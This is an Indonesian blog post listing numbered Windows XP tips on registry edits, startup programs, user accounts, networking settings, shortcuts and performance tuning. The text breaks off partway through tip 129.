150 trick pada Windows

•Mei 2, 2009 • 1 Komentar

150 Trik dan Tips yang ada di Windows

150 Trik dan Tips yang ada di Windows

oke sata akan menunjukan Trik dan Tips Windows ke pada saudara, Oke kita mulai aja ya 😀
01. Back-up dahulu registry sebelum diedit. Caranya, klik Start|Run,
ketik regedit. Setelah muncul window registry, pilih menu File|Export.
Pada bagian Export range, pilih All dan tentukan nama file, akhiri dengan
klik tombol Save.

02. Banyak program yang sebenarnya terinstalasi dalam Windows, namun
tidak aktif. Untuk mengaktifkannya, masuk ke Control Panel|Add/Remove
Windows Component dan beri tanda centang pada program yang belum aktif.

03. Sebelum menginstalasi program baru atau melakukan perubahan setting
Windows secara keseluruhan, lebih baik buat Restore Point secara manual
dahulu. Caranya, Klik Start|All Programs|Accessories|System Tool|System
Restore dan klik Create a restore point.

04. Jika Anda memutuskan untuk menginstalasi Windows Update yang
sebelumnya sudah didecline, masuk ke Control Panel|System, pilih tab
Automatic Updates dan klik Restore Declined Updates.

05. Untuk mengatur Windows update berjalan sesuai dengan kebutuhan
Anda, atur dulu Windows Update. Caranya, buka System di Control Panel dan
klik tab Automatic Updates. Atur enable atau disable option Keep my
computer up to date.

06. Bila Anda tidak memiliki CD bootable, jangan khawatir. Microsoft
sudah menyediakan
tool gratis untuk membuat disket booting di
http://support.microsoft.com/?kbid=310994.

07. Jika saat instalasi Windows tiba-tiba terhenti, matikan komputer
dan lepas card tambahan. Misalnya sound card. Instal ulang dan pasang
kembali card setelah instalasi selesai.

08. Untuk menambahkan System Administration Tools ada Start Menu, klik
kanan Start|Properties. Masuk dalam tab Start Menu dan klik Customize
kemudian masuk dalam tab Advanced. Geser ke bawah dan beri tanda centang
pada option Display on the All Programs and the Start Menu.

09. Untuk menginstal Back up Utility pada Windows XP Home Edition
carilah file ntbackup.msi di direktori\valudeadd\msft\ntbackup\ di CD
instalasi Windows XP. Jalankan file tersebut dan ikuti langkahlangkahnya.

10. Windows XP secara otomatis akan me-highlight setiap program baru
yang ter-install. Cara menghilangkannya, klik kanan Start|Properties.
Masuk ke tab Start Menu|Customize, kemudian klik tab Advanced dan
hilangkan tanda centang pada opsi Highlight newly installed program.

11. Untuk tampilan film atau game terbaik pada komputer, pastikan bahwa
DirextX terbaru sudah terinstalasi dengan baik. Lihat versi terbarunya
di http://www.microsoft.com/windows/directx.

12. Ada kalanya hardware yang akan dipasang belum support
Plug-and-Play. Untuk itu, gunakan Add Hardware Wizard yang ada di Control
Panel|System|Hardware untuk mendeteksinya.
–> TOP TIPS ! Mempercepat Kerja Komputer

13. Sebenarnya hanya dibutuhkan waktu tidak lebih dari 2 menit saja
untuk masuk ke Windows sejak komputer dihidupkan. Namun, kadang terasa
sangat lama. Untuk mempercepat loading Windows, ada beberapa hal yang bisa
dilakukan. Misalnya, mengurangi icon di desktop serta tidak menggunakan
wallpaper yang memakan banyak memory. Ganti wallpaper dengan background
berwarna, serta gunakan Desktop Cleanup Wizard yang ada bisa ditemui
dengan klik kanan pada desktop untuk membersihkan
icon. Jangan lupa juga, jalankan defrag secara berkala.
Jika Anda sering menambah atau mengurangi program di komputer,
bersihkan registry secara rutin. Gunakan software bantu seperti Registry
Mechanic dari situs http://www.winguides.com. Sayangnya, versi trial program ini
hanya bisa digunakan memperbaiki sebanyak 6 sections saja.
Langkah lain yang perlu dilakukan adalah me-remove program yang di-load
secara otomatis saat memulai Windows. Tentu saja, hanya program-program
yang tidak dibutuhkan. Caranya, dengan menghapus semua isi folder
startup dan membuka msconfig melalui Start|Run.

14. Gunakan fitur File and Transfer Setting Wizard untuk memindahkan
file dan setting ke komputer baru. Caranya, klik
Start|AllPrograms|Accessories|System Tools, kemudian jalankan File and Transfer Setting Wizard.

15. Gunakan pengecualian pada security setting di Internet Explorer,
agar proses update melalui halaman Windows Update berjalan lancar.
Caranya, buka Internet Option di menu Tools pada Internet Explorer. Klik tab
Security, pilih Trusted Site dan klik tombol Sites. Isikan nama situs
Windows Update, hilangkan tanda centang pada option Require server
verification… dan klik OK.

16. Jika Anda kehilangan serial number Windows XP, gunakan freeware
Magical Jelly Bean Keyfinder dari
http://www.magicaljellybean.com/keyfinder.shtml.

17. Jika nama yang teregister dalam Windows XP Anda tidak sesuai,
perbaiki melalui registry. Caranya, buka registry dan pilih MY Computer.
Klik menu Edit|Find dan ketik RegOwner. Jika sudah ditemukan, klik kanan,
pilih Modify dan isikan nama yang sesuai. Perubahan ini bisa juga
dilakukan di key RegCompany.Peningkatan Performa Internet dan Jaringan

18. Untuk men-share sebuah folder di komputer Anda ke jaringan, klik
kanan folder tersebut dan pilih Properties. Klik tab Sharing dan enable
option Share this folder on the network. Beri nama dan klik OK.

19. Buat sebuah icon My Network Places di desktop dengan mengklik kanan
area kosong di dekstop dan klik Properties. Pilih tab Desktop|Customize
Desktop. Kemudian buka tab General dan enable option My Network Places.

20. Ada cara mudah mengirim pesan ke komputer lain di jaringan, yakni
menggunakan Console Message. Buka Control
Panel|AdministrativeTools|Computer Management|Action|All Task|Send Console Message. Ketik teks yang
hendak dikirim, tambahkan nama komputer yang hendak dituju dan klik
Send.

21. Untuk mengatur Internet Connection Firewall (ICF), buka Network
Connection di Control Panel, klik kanan koneksi yang ada dan klik
Properties. Buka tab Advanced dan enable option Protect my computer and network
by limitting or preventing access to this computer from Internet.

22. Atur Internet Connection Firewall (ICF) untuk setiap koneksi yang
ada. Baik dial-up maupun broadband. Jika komputer Anda merupakan bagian
dari jaringan yang terhubung ke Internet, pasang ICF hanya di komputer
server.

23. Untuk mengetahui alamat IP Anda, masuk dalam DOS dengan mengetikkan
command di Run. Kemudian ketikkan ipconfig /all.

24. Jika Anda menerima pesan dari Internet melalui Messenger, segera
matikan. Caranya, masuk ke Contol Panel|Administrative Tools|Services,
dan klik ganda Messenger kemudian Stop. Untuk mencegah supaya tidak
terulang, atur supaya Messenger menjadi Disabled di bagian Startup.

25. Matikan Windows Messenger dengan melalui regedit. Buka
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft, kemudian pilih menu Edit|New|Key,
dan beri nama Messenger. Kemudian buat key lagi dengan cara ini di dalam
direktori Messenger dengan nama key-nya Client. Setelah itu, klik menu
Edit|New|DWORD Value, dan beri nama Prevent-Run. Klik kanan value
PreventRun, pilih Modify, isi angka 1 pada Value data, dan klik OK.

26. Untuk mengetahui informasi mengenai koneksi di komputer Anda, klik
Start|All Programs|Accessories|System Tools|System Information. Pilih
menu Tools|Net Diagnostics. Pada window yang terbuka kemudian pilih
option Scan your system. Tunggu hingga proses selesai untuk melihat
hasilnya.

27. Lindungi privasi dengan mencegah aplikasi Windows Media Player
mengirim data mengenai komputer dan kebiasaan Anda menggunakan komputer
melalui Internet ke alamat-alamat tertentu. Caranya mudah, Pada Windows
Media Player, pilih menu Tools|Option. Buka tab Player dan disable option
Aloww internet sites to uniquely your player.

28. Untuk mengunci komputer yang berada dalam sebuah network domain,
tekan tombol Ctrl + Alt + Del bersamaan dan klik option Lock Computer.
Untuk membuka kembali, tekan tombol Ctrl + Alt + Deldan masukkan
password. Konfigurasi Windows yang Mudah dan Cepat.

29. Untuk men-disable fitur autorun, klik kanan pada icon drive CD,
pilih Properties dan masuk dalam tab AutoPlay. Kemudian disable autoplay
untuk setiap jenis file yang tertera pada daftar.

30. Gunakan program Microsoft Clear Type Tuning Control dari
http://www.microsoft.com/typography/cleartype/ untuk mengatur Clear
Type pada komputer.

31. Untuk melihat system file yang secara default di-hidden oleh
Windows XP, pilih tab View dalam menu Tool|Folder Option dalam Windows
Explorer. Enable Display the content of system folder.

32. Untuk meletakkan icon volume control di taskbar, masuk dalam
Control Panel|Sound and Audio dan klik tab Volume. Enable Place volume
control in the Taskbar dan klik OK.

33. Atur tombol Power di keyboard melalui Control Panel|Power Option di
tab Advanced. Tentukan pengaturan tombol Power ini dengan memilih
option yang tersedia.

34. Atur supaya Windows membersihkan Pagefile saat shut down demi
keamanan. Caranya, buka registry dan masuk dalam direktori
HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control|Session Manager. Edit value pada key
Clear-PageFileAtShutdown menjadi 1. Konsekuensinya, proses shut down
akan berlangsung sedikit lebih lama.

35. Atur supaya Windows menampilkan ekstensi setiap file. Caranya, di
Windows Explorer, pilih menu Tool|Folder Option dan tab View. Hilangkan
tanda centang di option Hide file extentions for known file types.

36. Menghapus Komponen yang Terinstal
Banyak komponen Windows yang tidak muncul di Add/Remove Windows
Component sehingga tidak bisa di-uninstall.
a. Buka Notepad dan pilih menu File|Open. Arahkan ke folder
Windows\inf. Isi nama file sysoc.inf. Klik Open untuk membuka file ini.
b. Pilih menu Edit|Replace. Ketik Hide pada kolom Find, namun kosongkan
kolom Replace With, klik Replace All. Tujuannya untuk menghapus semua
kata Hide dalam file ini. Setelah selesai, tutup dan simpan file.
c. Buka Control Panel dan pilih Add/Remove Programs. Kemudian pilih
Add/Remove Windows Component, pada windows yang keluar kemudian akan
tampak beberapa komponen yang sebelumnya tersembunyi.

37. Ubah gambar pada welcome screen dengan cara masuk ke User Account
di Control Panel. Buka account Anda dan klik Change my picture. Tentukan
gambar pilihan Anda dengan mengklik Browse untuk gambar di harddisk
atau memilih di antara gambar yang sudah tersedia.

38. Jika lebih menyukai tampilan Start Menu versi lama, Anda bisa
mengubahnya dengan mengklik kanan tombol Start, pilih Properties. Pilih
Classic Start Menu dan klik Customize untuk mengatur isinya.

39. Untuk menyempurnakan tampilan klasik pada Start Menu, klik kanan
desktop dan pilih Properties. Buka tab Themes, dan pilih Windows Classic
dari Theme list.

40. Tambahkan image pada sebuah folder, sehingga image tersebut yang
akan tampak saat Windows Explorer dalam tampilan thumbnails. Caranya,
klik kanan folder yang hendak diolah, pilih Properties. Klik tab Customize
dan klik Choose Picture. Pilih sebuah gambar dan klik Open|OK.

41. Sesuaikan kapasitas Recycle Bin dengan mengklik kanan icon Recycle
Bin dan memilih
Properties. Isi kapasitas yang Anda inginkan dan klik OK.

42. Pada saat View di-set Details di Windows Explorer, klik kanan
header salah satu kolom untukmengatur kolom apa saja yang ditampilkan. Klik
More bila perlu mengatur setting lainnya.

43. Untuk menambahkan program yang paling sering Anda gunakan dalam
Quick Launch, drag icon program tersebut dalam Quick Launch.

44. Tambahkan address bar pada taskbar, sehingga mempercepat akses ke
sebuah alamat di Internet. Caranya, klik kanan taskbar, pilih
Toolbar|Address. Klik ganda untuk membuka dan menutupnya.

45. Jadikan tampilan Windows Explorer seperti tampilan pada window My
Computer. Caranya, klik kanan icon Window Explorer dan pilih Properties.
Pada Target area, setelah %SystemRoot%\explorer.exe tambahkan /n, /e,
/select, C:\ dan klik OK.

46. Untuk menambahkan sebuah shortcut program di baris paling atas
Start Menu, klik kanan icon-nya di Start Menu kemudian klik Pin to Start
Menu.

47. Supaya sebuah drive atau folder dapat masuk dalam menu Send To,
drag shortcut-nya ke folder \Documen Anda Setting\\SendTo.

48. Mencari folder SendTo? Klik saja Start|Run dan ketik SendTo
kemudian klik OK.

49. Untuk mengosongkan daftar dokumen dalam folder My Recent Document
di Start Menu, klik kanan Start, pilih Properties. Klik Customize dan
buka tab Advanced kemudian klik tombol Clear list. Supaya tidak ada lagi
yang muncul di My Recent Documents, disable option List my most
recently opened documents.

50. Fast User Switching
Dengan Fast User Switching, seorang user tidak perlu logoff sementara
user lain login.
a. Untuk meng-enable Fast User Switching, masuk dalam Control Panel dan
pilih User Accounts. Klik option Change the way user log on or off, dan
enable Use Fast User Switching.
b. Supaya koneksi dial-up tetap berjalan meski Fast User Switching
di-enable, masuk ke registry di direktori
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon.
c. Klik kanan pada panel sebelah kanan dan pilih New |String Value.
Beri nama KeepRasConnections dan beri nilai 1. Restart komputer.

51. Untuk melihat isi sesungguhnya folder My Recent Documents, klik
Start|Run, kemudian ketikkan %UserProfile%\Recent.
Pengaturan Multiple User

52. Untuk berpindah antar user account, tekan tombol Ctrl+Alt+Del,
kemudian pada window Task Manager yang terbuka, pilih tab Users. Klik kanan
nama user yang hendak dipakai dan klik tombol Connect.

53. Tambahkan account Guest supaya orang lain bisa menggunakan komputer
Anda. Caranya, buka User Accounts di Control Panel, klik Guest|Turn On
the Guest Account.

54. Ingatlah untuk selalu login sebagai System Administrator sebelum
melakukan perubahan yang berimbas pada performa komputer.

55. Untuk meng-copy user profile, masuk dalam Control Panel|System.
Masuk dalam tab Advance dan klik tombol Setting di User Profiles. Sorot
profile yang hendak dicopy, kemudian klik Copy to dan tentukan lokasi
penyimpanan profile. Untuk mengubah permission, klik tombol Change.

56. Ganti Welcome screen dengan login dialog untuk menambah tingkat
keamanan. Caranya, masuk dalam User Accounts di Control Panel, pilih
option Change the way user log on or off serta disable Welcome screen.

57. Gunakan folder Shared Documents untuk menyimpan filefile yang bisa
dibuka orang lain dalam jaringan. Folder ini bisa ditemui di My
Documents\Other Places area.

58. Pada Windows XP Pro Edition, password bisa kadaluarsa jika lama
tidak digunakan login. Untuk menghindarinya, atur supaya Windows tidak
melakukan hal tersebut. Caranya, klik Start|Run, ketikkan userpasswords2
dan Enter. Buka tab Advanced dan pilih Advanced user management, klik
tombol Advanced dan pilih Local Users and Groups. Klik kanan nama user
dan pilih Properties. Buka tab General dan enable option Password never
expires.

59. Beri nama setiap partisi atau drive yang ada dengan nama yang
berbeda. Hal ini penting untuk mempermudah pencarian file.

60. Buat sebuah password reset disk sebagai disket darurat saat
kehilangan password. Caranya, masuk ke Control Panel dan buka User Account.
Pilih account Anda dan pilih Prevent a forgotten password untuk memulai
wizard.

Pengaturan File dan Folder

61. Buat sebuah compressed folder dengan cara mengklik kanan area
kosong pada desktop, dan pilih New|Compressed (zipped) Folder. Beri nama dan
drag and drop file yang hendak dikompres dalam folder tersebut.

62. Sebuah compressed folder bisa dilindungi dengan password. Caranya,
buka menu File|Add a Password. Isikan password Anda dan isi sekali lagi
untuk konfirmasi.

63. Sebuah compressed folder tetap bisa ditambah isinya dengan cara
drag and drop file yang hendak dikompres ke dalamnya.

64. Saat menjalankan Disk Cleanup, pilih option Compress old files
untuk mengompresi file-file yang sudah tidak dibutuhkan, sehingga kapasitas
harddisk bisa dihemat.

65. Enkrip atau acak file bisa dilakukan di Windows XP Pro Edition
dengan mengklik kanan My Computer, pilih Properties. Buka tab General dan
klik Advanced. Aktifkan option Encrypt contents to secure data.

66. Cara termudah mengubah nama file atau folder adalah dengan
memilihnya, kemudian menekan tombol F2.

67. Supaya Anda bisa berpindah antar folder dengan cepat, terutama pada
folder-folder yang sering dibuka, buatlah shortcut untuk setiap folder
yang sering diakses.

68. Reset file association dengan cara menhakan tombol Shift saat
mengklik kanan sebuah file. Pilih Open With… Pilih program yang hendak Anda
gunakan untuk membuka file tersebut dan enable option Open use the
selected program to open this kind of file. Kemudian klik OK.

69. Sesuaikan kapasitas penyimpanan file musik dengan cara membuka
Windows Media Player dan memilih menu Tools|Options. Buka tab Copy Music
dan sesuaikan ukuran kapasitas dengan menggeser slider.

70. Jika Anda menyimpan semua dokumen dalam folder My Documents, maka
semua file tersebut lebih mudah di-back-up serta tidak terpengaruh
system restore.

71. Jika sebuah file hasil copy dari CD tidak dapat diakses, maka
hilangkan atribut Read only. Caranya, klik kanan file tersebut dan pilih
Properties. Hilangkan tanda centang pada option Read only.

72. Aturlah tampilan setiap folder dengan mengklik kanan folder
tersebut pada My Computer. Pilih Properties dan klik Customize. Pilih template
yang tersedia atau pilih gambar sesuai dengan keinginan Anda. Klik OK
untuk menyimpan hasil setting.

73. Anda bisa me-rename beberapa file sekaligus yang memiliki karakter
sama dalam folder yang sama juga. Misalnya kumpulan foto atau image.
Caranya, pilih semua file yang hendak di-rename, klik kanan file pertama
dan klik Rename. Beri nama,misalnya Koleksi.JPG, maka semua file yang
lain akan berubah namanya menjadi Koleksi (1).JPG, Koleksi (2).JPG, dan
seterusnya.

74. Mengirim Faks
Tahukah Anda, bahwa Windows XP memiliki tool untuk mengirim dan
menerima faks?
a. Buka Control Panel, pilih Add/Remove Program dan klik Add/Remove
Windows Component. Enable Fax Services dan klik Next.
b. Klik Start|All Programs|Accessories|Communication|Fax|Fax Console
untuk menjalankan Fax Configuration Wizard. Atur semua setting, termasuk
nomor faks dan modem yang digunakan serta pengaturan incoming fax.
c. Buat semua faks dari Fax Console. Periksa semua isi sebelum dikirim,
termasuk setting dan sebagainya.

Mengatur Kualitas Cetak

75. Anda bisa mencetak beberapa foto bersamaan, sekaligus mengatur
layout serta option lainnya dengan cara mudah. Pertama, buka file-file foto
dalam folder My Pictures, kemudian pilih menu File |Print. Akan muncul
Photo Printing Wizard. Atur printer yang hendak digunakan dan layout
yang akan dipakai. Beberapa printer memungkinkan mencetak beberapa foto
dalam satu kertas.

76. Daripada harus mengatur setting printer setiap kali menggunakannya,
buatlah copy printer Anda. Atur masing-masing dengan option berbeda
sesuai yang Anda butuhkan.

77. Anda bisa menggunakan karakter yang tidak ada di keyboard, namun
bisa digunakan dalam Windows dengan fitur Character Map. Untuk
membukanya, Anda bisa menemukan di Start|All Programs|Accessories|System
Toolss|Character Map. Atau ketik “charmap” tanpa tanda petik di Start|Run.

78. Untuk meng-capture sebuah adegan di file movie menjadi sebuah
image, putarlah film tersebut dan tekan tombol Stop saat adegan yang
diinginkan. Klik Take Picture, simpan di folder Anda dan beri nama.

Memunculkan Penampakan Fitur Tersembunyi

79. Anda tertarik dengan musik pembuka Windows yang orisinal? Temukan
file-nya di \windows\oobe\system32\images\tittle.wma.
80. Ada dua edisi Windows Plus! yang beredar, yakni Microsoft Plus! for
Windows dan Digital Media Edition (DME). Simak
http://www.microsoft.com/windows/plus/PlusHome.asp dan coba versi trial DME.

81. Ketikkan “iexpress” tanpa tanda petik pada kotak dialog Start|Run.
Anda akan menemukan sebuah utility untuk mengompres dan membuat file
self extraction.

82. Anda akan menemukan beberapa tool yang kurang populer, namun punya
kelebihan luar biasa. Tool-tool tersebut bisa ditemui di folder
support\tools dalam CD instalasi Windows XP. Gunakan program suptools.msi
untuk menginstalasi tool-tool tersebut dalam komputer Anda.

83. Ada banyak wizard atau stepby-step di Windows. Untuk mengetahui
wizard apa saja, buka Help and Support dan ketikkan “Wizard” tanpa tanda
petik pada kolom pencarian. Windows akan memunculkan daftar wizard yang
tersedia. Anda tinggal memilihnya.

84. Untuk membuat karakter sendiri, klik Start|Run dan ketikkan
Eudcedit. Buat sesuai keinginan Anda, asalakan masih dalam ukuran 64×64 grid.
Simpan dengan memilih menu Edit|Save Character.

85. Untuk meletakkan karakter dalam Character Map ke dalam dokumen,
Anda cukup membuka Character Map dan memilih karakter tersebut. Kemudian
Anda tinggal mengcopy dan paste-nya ke dalam dokumen Anda.

Menghias Desktop

86. Anda bisa mengatur pointer mouse sesuai keinginan dengan membuka
tab Pointer dalam menu Mouse di Control Panel. Klik Browse untuk mencari
pointer yang sesuai keinginan Anda.

87. Untuk menampilkan daftar dokumen yang terakhir diakses di Start
Menu pada Windows XP Home Edition, klik kanan pada tombol Start dan pilih
Properties. Klik Customize, buka tab Advanced dan enable option List my
most recently opened documents.

88. Jika Anda ingin agar tampilan Windows Explorer terbuka penuh hingga
menutupi taskbar, tekan tombol F11.

89. Anda bisa membuat shortcut key atau penekanan tombol tertentu untuk
mengakses sebuah program. Caranya, klik kanan icon program tersebut dan
pilih Properties. Buka tab Shortcut dan tentukan tombol mana yang Anda
gunakan untuk mengakses program tersebut. Secara otomatis Windows akan
menambahkan tombol Ctrl+Alt+ pilihan Anda sebagai shortcut key.

90. Urutkan secara alfabet, semua program yang ada di Start Menu untuk
memudahkan pengaksesan. Caranya, klik Start|All Programs, klik kanan
salah satu program yang ada dan pilih Sort by Name.

91. Munculkan penampakan icon indikator koneksi broadband atau dial-up
pada system tray untuk mempermudah kontrol. Caranya, buka My Network
Places, pilih View Networks Connections, klik kanan koneksi yang Anda
gunakan dan pilih Properties. Ubah option Show icon in notofication area
when connected menjadi enable.

92. Anda bisa mengedit Start Menu sesuai dengan kebutuhan. Baik
menambah, mengurangi, atau bahkan mengubah namanya. Caranya, klik kanan Start
dan pilih Open atau Open All Users. Atur setiap shortcut yang tersedia
sesuai kebutuhan.

93. Anda bisa membuka beberapa program secara bersamaan dengan menekan
tombol Shift, sementara mengklik program yang ada dalam Start Menu.

94. Untuk menghilangkan nama icon pada desktop, klik kanan icon
tersebut, dan pilih Rename. Tekan tombol Alt dan numeric key 255. Kemudan
tekan Enter.

95. Anda bisa menghilangkan tanda panah pada icon shortcut di desktop.
Caranya, masuk ke registry editor dengan mengetik “regedit” tanpa tanda
petik di kotak dialog Start|Run. Masuk ke dalam direktori
HKEY_CLASSES_ROOT\Lnkfile. Hapus value IsShortcut. 85

–> TOP TIPS !

96. Daftar Shortcut
Berikut ini beberapa shortcut yang paling banyak digunakan saat bekerja
sehari-hari menggunakan Windows.
[Windows] + [L] Lock komputer
[Windows] + Menampilkan Utility Manager
[Windows] + [R] Menampilkan Run
[Windows] + [F] Menampilkan window pencarian
[Windows] + [E] Membuka My Computer
[Windows] + [D] Mematikan atau mengaktifkan Toggle
Desktop
[Windows] + [M] Minimize semua window
[Windows] + [Shift] + [M] Restore semua window yang di-minimize
[Windows] + [Ctrl] + [F] Mencari komputer dalam jaringan
[Windows] + [F1] Menampilkan halaman Help
[Windows] + [Break] Memunculkan window System
Properties
[Windows] + [Tab] Scroll tombol di Taskbar
Jika Anda menggunakan keyboard lama yang tidak dilengkapi dengan tombol
Windows, gunakan paduan tombol Ctrl + Esc.

97. Anda bisa meng-enable atau disable grouping beberapa file dalam
satu program. Caranya, klik kanan taskbar dan pilih Properties. Beri atau
hilangkan tanda centang pada option Groups similar taskbar button.

98. Anda bisa menghilangkan atau menampilkan icon di desktop dengan
mengklik kanan desktop dan memilih Arrange Icons By|Show Desktop Icons.

99. Anda bisa membuat custom toolbar dengan mengklik kanan taskbar,
memilih Toolbars|New Toolbar. Atur sesuai dengan keinginan Anda, misalnya
menjadikan My Documents sebagai toolbar di taskbar supaya mudah dan
cepat diakses.

100. Klik kanan Start Menu, pilih Properties, jika tidak menggunakan
Classic Start Menu, klik Customize dan buka tab Advanced. Ada beberapa
munu yang bisa diaktifkan dengan memberi tanda centang pada option yang
ada. Mulai dari Scroll Programs hingga memunculkan penampakan beberapa
fitur dalam Start Menu.

101. Anda bisa membuka sebuah situs tanpa membuka browser terlebih
dahulu. Caranya, ketikkan alamat lengkap situs yang hendak dibuka di kotak
dialog Start|Run. Misalnya http://www.pcmedia.co.id. Kemudian tekan Enter.

102. Di setiap menu dalam Windows terdapat huruf yang bergaris bawah
sebagai patokan penggunaan navigasi keyboard. Misalnya menu File bisa
dibuka dengan menekan tombol Alt+F. Anda bisa menonaktifkan atau
mengaktifkan fitur yang ditandai dengan garis bawah ini. Caranya, klik kanan
area kosong di desktop. Kemudian buka tab Appereance, dan klik tombol
effects. Atur tanda centang pada option Hide underlined letter for keyboard
navigation until I press the [Alt] key.

103. Atur supaya komputer mengeluarkan suara peringatan saat tombol
Caps Lock, Num Lock atau Scroll Lock diaktifkan. Caranya, Buka Control
Panel, masuk dalam Accessibility Option. Buka tab Keyboard dan enable
option Use Toggle-Keys.

104. Untuk meng-enable Hibernate dalam Windows XP saat menekan Turn Off
di Start Menu, tahan tombol Shift. Maka tombol Stand by pada kotak
dialog Shut Down akan berubah menjadi Hibernate.

105. Jika hardware Anda support Hibernate, aktifkan segera fitur ini.
Caranya, buka Control Panel dan buka Power Options. Klik tab Hibernate
dan beri tanda centang pada option Enable Hibernate. Jika hardware Anda
tidak support Hibernate, tab ini tidak bisa ditemui.

Memperbaiki Kinerja Komputer

106. Tambah kecepatan komputer Anda dengan menghilangkan penampakan
yang bagus namun memakan banyak waktu, yakni animasi. Caranya, buka
Control Panel, dan klik ganda System. Klik tab Advanced dan tekan tombol
Performance Settings. Kemudian enable option Adjust for the best
performance.

107. Untuk mengurangi waktu booting yang terasa lama, atur di BIOS agar
booting dimulai dari harddisk baru kemudian CD atau floppy drive pada
pilihan berikutnya.

108. Atur supaya Windows hanya akan me-load program yang dibutuhkan
saja saat mulai berjalan supaya waktu loading lebih cepat dan kerja
komputer lebih ringan. Ketikkan “msconfig” tanpa tanda petik di kotak dialog
Run dan tekan Enter. Pada tab General, pilih option Selective Startup,
kemudian buka tab Startup dan nonaktifkan semua program yang tidak
perlu.

109. Anda bisa memonitor penggunaan processor dengan menekan tombol
Ctrl+Alt+Del untuk membuka Task Manager. Kemudian minimize window
tersebut, Anda akan melihat grafik penggunaan kapasitas processor di system
tray.

110. Untuk meningkatkan kecepatan menyimpan data di USB ZIP drive, buka
My Computer dan klik kanan drive ZIP tersebut. Pilih Properties, buka
tab Hardware klik Properties, kemudian buka tab Policies dan aktifkan
option Optimize for Performance.

111. Untuk mempercepat tampilan Start Menu, buka Registry Editor
(ketikkan “regedit” tanpa tanda petik di kotak dialog Run). Masuk dalam
direktori HKEY_CURRENT_USER\Control Panel\Desktop. Klik ganda value yang
bernama MenuShowDelay, ganti angka yang ada menjadi 100. Dengan cara ini,
maka delay tampilan Start Menu semakin singkat.

112. Ada cara cepat mematikan komputer. Tekan tombol Ctrl+Alt+Del, pada
windows Task Manager yang muncul, tekan menu Shut Down dan tahan tombol
Ctrl saat mengklik Turn Off. Pastikan dulu semua dokumen telah di-save.

113. Anda bisa melihat grafis yang menampilkan performance komputer
berdasarkan beberapa indikator. Misalnya penggunaan processor, memory, dan
lain sebagainya. Caranya, buka Control Panel dan klik ganda
Administrative Tools. Buka fitur Performance.

114. Anda juga bisa menambahkan beberapa indikator lain dalam fitur
Performance (di nomer 13) dengan mengklik icon + dan memilih indikator
baru apa saja yang hendak ditampilkan.

115. Anda bisa menggabungkan sebuah file registry atau .reg ke dalam
registry Windows Anda, dengan mengklik ganda file tersebut. Untuk
mengetahui fungsinya, buka dengan notepad.

116. Jika Anda menggunakan RAM sebesar 512 MB, atur agar Windows tidak
membuat paging ke disk agar performance komputer semakin meningkat.
Caranya, buka Registry Editor dan masuk dalam direktory
HKEY_LOCAL_MACHINE\SYSTEM|Current ControlSet\Control\SessionManager\MemoryManagement.
Ubah value DisablePagingExecutive menjadi 1.

117. Gunakan Bootcfg.exe untuk mengedit boot.ini Windows XP. Caranya,
ketikkan “cmd” tanpa tanda petik dalam kotak dialog Run untuk masuk
dalam DOS Prompt, dan ketikkan bootcfg: /? setelah muncul prompt untuk
memperoleh informasi mengenai fitur dalam program ini.

118. Untuk memilih operating system dalam yang digunakan dalam sebuah
komputer yang memiliki partisi drive, buka Control Panel, masuk dalam
System kemudian buka tab Advanced. Klik tombol Startup and Recovery
Setting kemudian Edit.

119. Gunakan utility klasik chkdsk untuk men-scan harddisk dan
memperbaiki error yang ditemui. Caranya, klik Start |Run dan ketikkan “chkdsk
c:/f” tanpa tanda petik untuk men-scan dan memperbaiki drive C. Jika
Anda ingin tahu lebih banyak tentang fitur dalam chkdsk, ketikkan “chkdsk
/?”.

120. Anda bisa melewati Scanner and Camera Wizard saat memasang kamera
digital. Untuk mengaksesnya, gunakan Windows Explorer atau My Computer.
Kamera digital Anda akan tampil sebagai drive.

121. Ada utility dalam Windows XP Pro Edition yang jarang digunakan,
yakni gpedit. Jalankan utility ini dengan mengetikkan “gpedit.msc” tanpa
tanda petik di kotak dialog Run dan tekan Enter. Utility ini bisa
digunakan untuk setiap tool dan komponen yang ada di Windows. Coba satu per
satu setting yang Anda inginkan kemudian perhatikan hasilnya.

122 Mengatur Jadwal Perawatan
Daripada bersusah payah membersihkan sampah di Windows, atur agar
Windows membersihkan dirinya sendiri secara berkala dengan Schedule Task.
a. Untuk mengatur jadwal perawatan Windows secara berkala, buka Control
Panel, klik ganda Scheduled Tasks. Tambahkan Scheduled Task melalui
wizard. Klik Next untuk masuk dalam list berisi program yang bisa
dijadwalkan.
b. Jika tool yang hendak Anda jadwalkan tidak tertera pada list, klik
Browse dan arahkan ke folder tempat tool yang Anda maksud berada.
Kebanyakan tool Windows berada dalam folder Windows\system32. Pilih salah
satu dan klik Open.
c. Ketik nama task tersebut dan tentukan tingkat keseringan atau
frekuensi jadwal program tersebut. Klik Next, atur setting lain yang
diperlukan dan tambahkan username beserta password untuk mengamankan Schedule
Task.

123. Gunakan utility gratis PowerToys dari
http://www.microsoft.com/windowsxp/home/downloads/powertoys.asp yang sangat berguna. PowerToys sendiri
terdiri dari beberapa program, di antaranya Open Command Window Here,
Alt-Tab Replacement, Tweak UI, Power Calculator, Image Resizer, CD Slide
Show Generator, Virtual Desktop Manager,Taskbar Magnifier, HTML Slide
Show Wizard, dan Webcam Timershot.

124. Windows Anda bisa memperoleh tambahan kecepatan jika Indexing
Service dinonaktifkan. Caranya mudah, buka Administrative Tools di Control
Panel, pilih Services dan disable Indexing Service.
125. Kembangkan kapasitas harddisk dengan menggunakan Disk Cleanup.
Buka My Computer, klik kanan drive yang ada dan pilih Properties. Buka tab
General dan klik tombol Disk Cleanup. Bersihkan semua file sampah
tersebut, termasuk mengosongkan isi Recycle Bin dari semua data yang sudah
tidak digunakan lagi.

126. Hilangkan semua shortcut di folder Startup dalam Start Menu.
Sebab, program yang memiliki shortcut dalam folder ini secara otomatis akan
dieksekusi saat kali pertama Windows dijalankan.

127. Periksa setting messenger yang ada dalam komputer Anda, karena
hampir setiap messenger akan me-load dirinya sendiri secara otomatis
setiap kali Windows dijalankan. Usahakan agar option Automatically Login
atau Load at Windows Start tidak aktif.

128. Anda bisa mengakses setiap program secara langsung dengan
mengetikkan nama programnya di kotak dialog Run. Misalnya calc untuk
kalkulator, winword untuk Microsoft Word, dan lain sebagainya.

Troubleshooting Sederhana

129. Jika saat defrag tiba-tiba komputer berhenti, restart dan masuk
